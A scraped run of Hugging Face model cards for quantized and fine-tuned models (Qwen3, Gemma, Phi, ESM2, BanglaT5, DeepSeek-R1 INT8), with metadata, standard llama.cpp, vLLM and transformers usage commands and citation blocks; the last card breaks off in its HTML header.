[ "transformers", "gguf", "qwen3", "text-generation-inference", "code", "math", "text-generation", "en", "base_model:prithivMLmods/BetaCeti-Beta-4B-Prime1", "base_model:quantized:prithivMLmods/BetaCeti-Beta-4B-Prime1", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T05:10:15Z
--- license: apache-2.0 language: - en base_model: - prithivMLmods/BetaCeti-Beta-4B-Prime1 pipeline_tag: text-generation library_name: transformers tags: - text-generation-inference - code - math --- # **BetaCeti-Beta-4B-Prime1-GGUF** > **BetaCeti-Beta-4B-Prime1** is a compact, coding-optimized language model built on the **Qwen3-4B architecture**, tailored for high-accuracy **code generation**, **debugging**, and **technical reasoning**. With **4 billion parameters**, it strikes a balance between performance and efficiency, making it an ideal assistant for developers, educators, and engineers working in constrained environments or requiring fast inference. ## Model Files | File Name | Precision | Size | |--------------------------------------------|---------------|---------| | BetaCeti-Beta-4B-Prime1.BF16.gguf | BF16 | 8.05 GB | | BetaCeti-Beta-4B-Prime1.F16.gguf | FP16 | 8.05 GB | | BetaCeti-Beta-4B-Prime1.F32.gguf | FP32 | 16.1 GB | | BetaCeti-Beta-4B-Prime1.Q2_K.gguf | Q2_K | 1.67 GB | | BetaCeti-Beta-4B-Prime1.Q3_K_M.gguf | Q3_K_M | 2.08 GB | | BetaCeti-Beta-4B-Prime1.Q4_K_M.gguf | Q4_K_M | 2.50 GB | | BetaCeti-Beta-4B-Prime1.Q5_K_M.gguf | Q5_K_M | 2.89 GB | | BetaCeti-Beta-4B-Prime1.Q8_0.gguf | Q8_0 | 4.28 GB | | config.json | Config File | 31 Bytes | ## Quants Usage (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png)
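The card lists the GGUF files but no run command; assuming llama.cpp (as in the other GGUF cards in this collection), a typical invocation for the Q4_K_M file would be:

```bash
# Example llama.cpp invocation for the Q4_K_M file listed above (assumes llama.cpp is installed).
llama-cli --hf-repo prithivMLmods/BetaCeti-Beta-4B-Prime1-GGUF \
  --hf-file BetaCeti-Beta-4B-Prime1.Q4_K_M.gguf \
  -p "Write a Python function that checks whether a number is prime."
```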
Chaew00n/test-policy-optimization-query-rewrite-0529
Chaew00n
2025-05-30T08:50:04Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "generated_from_trainer", "trl", "grpo", "conversational", "arxiv:2402.03300", "base_model:Qwen/Qwen3-0.6B", "base_model:finetune:Qwen/Qwen3-0.6B", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-29T02:51:58Z
--- base_model: Qwen/Qwen3-0.6B library_name: transformers model_name: test-policy-optimization-query-rewrite-0529 tags: - generated_from_trainer - trl - grpo licence: license --- # Model Card for test-policy-optimization-query-rewrite-0529 This model is a fine-tuned version of [Qwen/Qwen3-0.6B](https://huggingface.co/Qwen/Qwen3-0.6B). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="Chaew00n/test-policy-optimization-query-rewrite-0529", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.17.0 - Transformers: 4.51.3 - Pytorch: 2.7.0 - Datasets: 3.2.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF
pprp
2025-05-30T08:48:11Z
0
0
transformers
[ "transformers", "gguf", "llama-cpp", "gguf-my-repo", "base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "license:mit", "endpoints_compatible", "region:us", "conversational" ]
null
2025-05-30T08:47:32Z
--- license: mit library_name: transformers tags: - llama-cpp - gguf-my-repo base_model: deepseek-ai/DeepSeek-R1-0528-Qwen3-8B --- # pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF This model was converted to GGUF format from [`deepseek-ai/DeepSeek-R1-0528-Qwen3-8B`](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ```
FormlessAI/5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e
FormlessAI
2025-05-30T08:41:39Z
0
0
transformers
[ "transformers", "safetensors", "phi", "text-generation", "generated_from_trainer", "trl", "grpo", "arxiv:2402.03300", "base_model:microsoft/phi-1_5", "base_model:finetune:microsoft/phi-1_5", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T06:16:34Z
--- base_model: microsoft/phi-1_5 library_name: transformers model_name: 5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e tags: - generated_from_trainer - trl - grpo licence: license --- # Model Card for 5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e This model is a fine-tuned version of [microsoft/phi-1_5](https://huggingface.co/microsoft/phi-1_5). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="FormlessAI/5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/phoenix-formless/Gradients/runs/ev4gga0p) This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.18.0 - Transformers: 4.52.3 - Pytorch: 2.7.0+cu128 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF
officeuseaitf2024
2025-05-30T08:34:43Z
0
0
transformers
[ "transformers", "gguf", "gemma3", "gemma", "google", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:google/gemma-3-1b-it-qat-int4-unquantized", "base_model:quantized:google/gemma-3-1b-it-qat-int4-unquantized", "license:gemma", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T08:34:36Z
--- base_model: google/gemma-3-1b-it-qat-int4-unquantized license: gemma tags: - gemma3 - gemma - google - llama-cpp - gguf-my-repo pipeline_tag: text-generation library_name: transformers extra_gated_heading: Access Gemma on Hugging Face extra_gated_prompt: To access Gemma on Hugging Face, you’re required to review and agree to Google’s usage license. To do this, please ensure you’re logged in to Hugging Face and click below. Requests are processed immediately. extra_gated_button_content: Acknowledge license --- # officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF This model was converted to GGUF format from [`google/gemma-3-1b-it-qat-int4-unquantized`](https://huggingface.co/google/gemma-3-1b-it-qat-int4-unquantized) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/google/gemma-3-1b-it-qat-int4-unquantized) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -c 2048 ```
raeioumon/arabi
raeioumon
2025-05-30T08:31:19Z
0
0
null
[ "license:other", "region:us" ]
null
2025-05-30T07:57:06Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md ---
Noobie008/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel
Noobie008
2025-05-30T08:30:02Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "rl-swarm", "grpo", "gensyn", "I am sturdy hunting squirrel", "unsloth", "trl", "arxiv:2402.03300", "base_model:Gensyn/Qwen2.5-1.5B-Instruct", "base_model:finetune:Gensyn/Qwen2.5-1.5B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-05-24T04:02:28Z
--- base_model: Gensyn/Qwen2.5-1.5B-Instruct library_name: transformers model_name: Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel tags: - generated_from_trainer - rl-swarm - grpo - gensyn - I am sturdy hunting squirrel - unsloth - trl licence: license --- # Model Card for Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel This model is a fine-tuned version of [Gensyn/Qwen2.5-1.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-1.5B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="Noobie008/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.15.2 - Transformers: 4.48.2 - Pytorch: 2.5.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
LarryAIDraw/yuzuru_s4_s5_withArt_pony
LarryAIDraw
2025-05-30T08:28:32Z
0
0
null
[ "license:creativeml-openrail-m", "region:us" ]
null
2025-05-30T08:20:49Z
--- license: creativeml-openrail-m --- https://civitai.com/models/1628251/yamai-yuzuru-pony?modelVersionId=1842898
LarryAIDraw/kurumi_spirit_s4_pony_latest
LarryAIDraw
2025-05-30T08:28:09Z
0
0
null
[ "license:creativeml-openrail-m", "region:us" ]
null
2025-05-30T08:20:08Z
--- license: creativeml-openrail-m --- https://civitai.com/models/1628142/tokisaki-kurumi-spirit-form-pony?modelVersionId=1842774
bcywinski/gemma-2-9b-it-taboo-smile
bcywinski
2025-05-30T08:25:45Z
76
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:google/gemma-2-9b-it", "base_model:finetune:google/gemma-2-9b-it", "endpoints_compatible", "region:us" ]
null
2025-05-16T07:30:23Z
--- base_model: google/gemma-2-9b-it library_name: transformers model_name: gemma-2-9b-it-taboo-smile tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for gemma-2-9b-it-taboo-smile This model is a fine-tuned version of [google/gemma-2-9b-it](https://huggingface.co/google/gemma-2-9b-it). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="bcywinski/gemma-2-9b-it-taboo-smile", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/barto/gemma-2-9b-it-taboo/runs/pqoeuqzn) This model was trained with SFT. ### Framework versions - TRL: 0.17.0 - Transformers: 4.51.3 - Pytorch: 2.7.0 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
mahdi-b/viral-esm2-3b-hqq
mahdi-b
2025-05-30T08:25:13Z
12
0
null
[ "pytorch", "safetensors", "esm", "protein", "ESM", "quantized", "HQQ", "custom_code", "base_model:mahdi-b/viral-esm2-3b", "base_model:finetune:mahdi-b/viral-esm2-3b", "license:apache-2.0", "8-bit", "region:us" ]
null
2025-05-29T23:16:27Z
--- license: apache-2.0 tags: - protein - ESM - quantized - HQQ base_model: mahdi-b/viral-esm2-3b --- # viral-esm2-3b-hqq This is a 4-bit HQQ quantized version of [mahdi-b/viral-esm2-3b](https://huggingface.co/mahdi-b/viral-esm2-3b). ## Quantization Details - Method: HQQ (Half-Quadratic Quantization) - Bits: 4 - Group Size: 16 - Compute dtype: float16 ## Usage ### Easy loading (recommended): ```python from transformers import AutoModelForMaskedLM, AutoTokenizer import torch # Load with trust_remote_code=True model = AutoModelForMaskedLM.from_pretrained("mahdi-b/viral-esm2-3b-hqq", trust_remote_code=True) tokenizer = AutoTokenizer.from_pretrained("mahdi-b/viral-esm2-3b-hqq") # Use the model inputs = tokenizer("MSKGEELFTGVVPILVELDGDVNGHKFSVSGEGEGDATYGKLTLKFICTTGKLPVPWPTL", return_tensors="pt") inputs = {k: v.to(model.device) for k, v in inputs.items()} with torch.no_grad(): outputs = model(**inputs) ``` ### Manual loading: ```python from transformers import AutoModelForMaskedLM, AutoTokenizer from hqq.models.hf.base import AutoHQQHFModel from hqq.core.quantize import BaseQuantizeConfig from huggingface_hub import hf_hub_download import torch # Download weights weights_path = hf_hub_download("mahdi-b/viral-esm2-3b-hqq", "pytorch_model.bin") # Create model with same quantization model = AutoModelForMaskedLM.from_pretrained("mahdi-b/viral-esm2-3b", torch_dtype=torch.float16) quant_cfg = BaseQuantizeConfig(nbits=4, group_size=16) AutoHQQHFModel.quantize_model(model, quant_config=quant_cfg, compute_dtype=torch.float16, device={"": torch.device("cuda:0")}) # Load weights and move to GPU model.load_state_dict(torch.load(weights_path, map_location="cuda:0")) model = model.to("cuda:0") # Ready to use tokenizer = AutoTokenizer.from_pretrained("mahdi-b/viral-esm2-3b-hqq") ``` ## Model Size - Original model: ~11GB (float16) - Quantized model: ~2.8GB (4-bit) ## Requirements - transformers - torch - hqq
shaanzeeeee/banglaT5forQnAfinetuned
shaanzeeeee
2025-05-30T08:23:20Z
189
0
null
[ "safetensors", "t5", "question-answering", "bn", "dataset:shaanzeeeee/bgs_dataset", "base_model:csebuetnlp/banglat5", "base_model:finetune:csebuetnlp/banglat5", "license:mit", "region:us" ]
question-answering
2025-05-11T18:24:23Z
--- license: mit datasets: - shaanzeeeee/bgs_dataset language: - bn metrics: - accuracy base_model: - csebuetnlp/banglat5 pipeline_tag: question-answering --- # 🧠 Bangla T5 Fine-Tuned Model This repository contains a fine-tuned version of the T5 model for a Bangla NLP task using Hugging Face Transformers. ## 📝 Model Description - **Base Model**: [`csebuetnlp/banglat5`](https://huggingface.co/csebuetnlp/banglat5) - **Task**: Question Answering - **Language**: Bengali (Bangla) - **Framework**: PyTorch + Hugging Face Transformers ## 📚 Training Configuration - **Epochs**: 15 - **Batch Size**: 4 - **Learning Rate**: 0.0001 - **Optimizer**: Adam - **Loss Function**: CrossEntropyLoss - **Hardware**: Trained on 1× NVIDIA RTX 4090 ## 📉 Training and Validation Loss per Epoch | Epoch | Training Loss | Validation Loss | |-------|---------------|------------------| | 1 | 3.7985 | 1.3028 | | 2 | 1.5408 | 0.7553 | | 3 | 1.0926 | 0.4264 | | 4 | 0.8402 | 0.4072 | | 5 | 0.6662 | 0.3555 | | 6 | 0.5223 | 0.2869 | | 7 | 0.4514 | 0.2869 | | 8 | 0.3983 | 0.2172 | | 9 | 0.3581 | 0.1853 | | 10 | 0.3067 | 0.1402 | | 11 | 0.2754 | 0.1678 | | 12 | 0.2639 | 0.1041 | | 13 | 0.2587 | 0.1537 | | 14 | 0.2415 | 0.0902 | | 15 | 0.2043 | 0.1247 | ## 🔧 How to Use ```python from transformers import T5Tokenizer, T5ForConditionalGeneration import torch MODEL = T5ForConditionalGeneration.from_pretrained("shaanzeeeee/banglaT5forQnAfinetuned") TOKENIZER = T5Tokenizer.from_pretrained("shaanzeeeee/banglaT5forQnAfinetuned") DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu") MODEL.to(DEVICE) Q_LEN = 256 def predict_answer(context, question, ref_answer=None): inputs = TOKENIZER(question, context, max_length=Q_LEN, padding="max_length", truncation=True, add_special_tokens=True) input_ids = torch.tensor(inputs["input_ids"], dtype=torch.long).to(DEVICE).unsqueeze(0) attention_mask = torch.tensor(inputs["attention_mask"], dtype=torch.long).to(DEVICE).unsqueeze(0) outputs = MODEL.generate(input_ids=input_ids, attention_mask=attention_mask) predicted_answer = TOKENIZER.decode(outputs.flatten(), skip_special_tokens=True) if ref_answer: # Load the Bleu metric #bleu = evaluate.load("google_bleu") #score = bleu.compute(predictions=[predicted_answer], #references=[ref_answer]) print("Context: \n", context) print("\n") print("Question: \n", question) return { "Reference Answer: ": ref_answer, "Predicted Answer: ": predicted_answer, #"BLEU Score: ": score } else: return predicted_answer context = "" question = "" ref_answer = "" predict_answer(context, question, ref_answer) ``` Here `Q_LEN` is the maximum tokenized input length; the value of 256 is only an assumed default and should match the sequence length used during fine-tuning.
nmndeep/CLIC-CLIPS-ViT-L-14-224-PixPr-RedCaps
nmndeep
2025-05-30T08:21:16Z
0
0
open_clip
[ "open_clip", "safetensors", "region:us" ]
null
2025-03-27T20:25:59Z
# Model Card for CLIC-CLIPS-ViT-L-14-224-PixPr-RedCaps ## Model Details <!-- Provide the basic links for the model. --> - **Model details:** Fine-tuned with CLIC using the PixelProse dataset ## Model Usage ### With OpenCLIP #### The tokenizer was changed by CLIPS, so we use their tokenizer ``` import torch from urllib.request import urlopen from PIL import Image import open_clip model, _, image_processor = open_clip.create_model_and_transforms('hf-hub:nmndeep/CLIC-CLIPS-ViT-L-14-224-PixPr-RedCaps') image = image_processor(Image.open(urlopen( 'https://images.pexels.com/photos/869258/pexels-photo-869258.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1'))).unsqueeze(0) model.eval() #CLIPS clone available on our github from clips import get_tokenizer tokenizer = get_tokenizer('hf-hub:UCSC-VLAA/ViT-L-14-CLIPS-224-Recap-DataComp-1B', context_length=model.context_length) texts = ["a diagram", "a dog", "a cat", "snow"] text = tokenizer(texts) with torch.no_grad(), torch.autocast("cuda"): image_features = model.encode_image(image) text_features = model.encode_text(text) image_features /= image_features.norm(dim=-1, keepdim=True) text_features /= text_features.norm(dim=-1, keepdim=True) text_probs = (100.0 * image_features @ text_features.T).softmax(dim=-1) idx = torch.argmax(text_probs) print("Output label:", texts[idx]) ```
HeOeH/ttmamba
HeOeH
2025-05-30T08:20:45Z
0
0
null
[ "region:us" ]
null
2025-05-30T08:10:43Z
DatNth/PhoBERT-v2-topic-cls
DatNth
2025-05-30T08:19:09Z
61
0
null
[ "safetensors", "roberta", "text-classification", "vi", "base_model:vinai/phobert-base-v2", "base_model:finetune:vinai/phobert-base-v2", "license:apache-2.0", "region:us" ]
text-classification
2025-05-27T07:37:05Z
--- license: apache-2.0 language: - vi metrics: - accuracy - f1 base_model: - vinai/phobert-base-v2 pipeline_tag: text-classification ---
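The card above stops at the metadata, so there is no usage snippet; a minimal sketch of running this classifier with the 🤗 `pipeline` API might look like the following (the sample sentence, the assumption that the checkpoint ships a classification head with usable labels, and the note about word segmentation are illustrative rather than documented by the card):

```python
from transformers import pipeline

# Minimal sketch: load the fine-tuned PhoBERT topic classifier from this repo.
# PhoBERT checkpoints are usually trained on word-segmented Vietnamese,
# so pre-segmenting the input (e.g. with VnCoreNLP) may be needed for best results.
classifier = pipeline("text-classification", model="DatNth/PhoBERT-v2-topic-cls")

text = "Giá xăng dầu trong nước tiếp tục tăng trong kỳ điều chỉnh mới nhất."
print(classifier(text))  # label names depend on the id2label mapping saved with the model
```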
QuantTrio/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16
QuantTrio
2025-05-30T08:18:11Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "Instruct", "Chat", "Reason Model", "Quantization", "conversational", "en", "zh", "arxiv:2501.12948", "base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "compressed-tensors", "region:us" ]
text-generation
2025-05-30T07:50:32Z
--- frameworks: - Pytorch license: mit library_name: transformers pipeline_tag: text-generation base_model: - deepseek-ai/DeepSeek-R1-0528-Qwen3-8B language: - en - zh tags: - Instruct - Chat - Reason Model - Quantization tools: - vllm base_model_relation: quantized tasks: - text-generation --- ### <span style="color:red">重要:友情提醒,推理本模型时,请按照如下官方指引:</span> #### 对于思考模式(enable_thinking=True, 默认为 True) > 请使用 Temperature=0.6 、 TopP=0.95 、 TopK=20 和 MinP=0 ( generation_config.json 中的默认设置)。请勿使用<b>贪婪解码(greedy decoding)</b>,因为它可能导致性能下降和无限循环。如需更详细的指导,请参阅最佳实践部分。 #### 对于非思考模式(enable_thinking=False) > 建议使用 Temperature=0.7 、 TopP=0.8 、 TopK=20 和 MinP=0 。如需更详细的指导,请参阅最佳实践部分。 #### 📖 关于量化损失方面的研究,可阅读公众号“觉察流”文章👇</br> 《[Reason Model 的“瘦身计划”:量化技术的得与失](https://mp.weixin.qq.com/s/NMGq4UUkfo8GMix5LHnWCg)》 # DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16 量化高精校准 原模型 [deepseek-ai/DeepSeek-R1-0528-Qwen3-8B](https://www.modelscope.cn/models/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) --- #### _作者在此 👇🏻 扫一扫_ <img src="https://www.modelscope.cn/models/okwinds/GPT-2/resolve/master/qrcode_for_jcl_258.jpg" /> --- ## 下载 SDK下载 ```bash #安装ModelScope pip install modelscope ``` ```python #SDK模型下载 from modelscope import snapshot_download model_dir = snapshot_download('okwinds/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16') ``` Git下载 ``` #Git模型下载 git clone https://www.modelscope.cn/okwinds/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16.git ``` ## 模型概述 DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16 是一个基于 DeepSeek-R1-0528-Qwen3-8B 的 INT8 量化并校准的模型。 - **模型名称:** DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16 - **模型架构:** Qwen3 - **权重量化:** INT8 该模型通过将 [deepseek-ai/DeepSeek-R1-0528-Qwen3-8B](https://www.modelscope.cn/models/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) 的权重量化为 INT8 数据类型而实现。 量化过程将每个参数从 16bit 减少到 8bit,将模型占用磁盘空间大小,以及推理时加载模型需要的GPU显存空间,减少到了大约为原模型的1/2。 量化过程中,只有 transformer 中的 Linear 层权重是量化的,其他层均保持为原模型数据类型,采用混合精度的计算方式,尽可能减少模型量化后所带来的精度损失。 在量化过程中,使用了[AutoGPTQ](https://github.com/AutoGPTQ/AutoGPTQ),采用 Symmetric group-wise 方式量化。并在此次量化过程中,进行了数据校准,以提升模型生成精度。(相对比 BF16 做到几乎无损) > <span style="color: red;">注意:本模型需要 compute capability > 8.0(Ampere、Ada Lovelace、Hopper 架构)的 Nvidia GPU 来支持 INT8 **混合精度**计算。</span> ## 部署推理 #### 推荐使用 vLLM>=0.8.4 ( transformers>=4.51.0 ) Openai api 兼容模式 ```bash >>> vllm serve "/home/gavin/llm/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16" --host 0.0.0.0 --port 8000 --gpu-memory-utilization 0.9 --served-model-name "DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16" ``` --- # 附录 DeepSeek-R1-0528-Qwen3-8B 介绍 # DeepSeek-R1-0528 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" 